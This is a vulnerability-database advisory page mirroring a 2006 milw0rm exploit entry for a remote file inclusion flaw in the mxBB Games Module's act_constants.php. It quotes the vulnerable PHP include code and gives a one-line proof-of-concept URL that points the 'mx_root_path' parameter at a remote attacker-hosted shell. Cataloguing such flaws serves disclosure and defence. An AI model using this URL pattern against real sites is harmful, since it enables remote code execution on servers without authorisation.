mx_act (mxBB Games Module) --Remote File Inclusion Exploit

vendor:

mxBB Games Module

by:

Dr Max Virus

8,8

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: mxBB Games Module

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

mx_act (mxBB Games Module) –Remote File Inclusion Exploit

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'mx_root_path' parameter to the 'modules/mx_act/include/constants/act_constants.php' script. A remote attacker can exploit this vulnerability to execute arbitrary PHP code on the vulnerable system.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.

Source

Exploit-DB raw data:

# mx_act (mxBB Games Module)   --Remote File Inclusion Exploit
# Bug Found & Exploit [c]oded By Dr Max Virus
# Download:http://www.mx-system.com/index.php?page=4&action=file&file_id=71

Problem area:

	if ( !file_exists($mx_root_path . 'modules/mx_act/language/lang_' . $board_config['default_lang'] . '/lang_activity.'.$phpEx ) )
	{
	  	include( $mx_root_path . 'modules/mx_act/language/lang_english/lang_activity.'.$phpEx );
		$link_language='lang_english';
	}	
	else
	{
	  	include(  $mx_root_path . 'modules/mx_act/language/lang_' . $board_config['default_lang'] . '/lang_activity.'.$phpEx );
		$link_language='lang_' . $board_config['default_lang'];
	} 

PoC:
	
	http://site.com/mxBB/modules/mx_act/include/constants/act_constants.php?mx_root_path=http://[yourshell]?&	
	

# exploit was broken and removed. /str0ke

# milw0rm.com [2006-12-11]